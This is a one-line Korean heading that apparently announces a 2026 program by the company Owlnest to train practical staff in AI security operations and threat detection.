(주)아울네스트 · 26년 AI 보안운영 및 위협탐지 실무인력 양성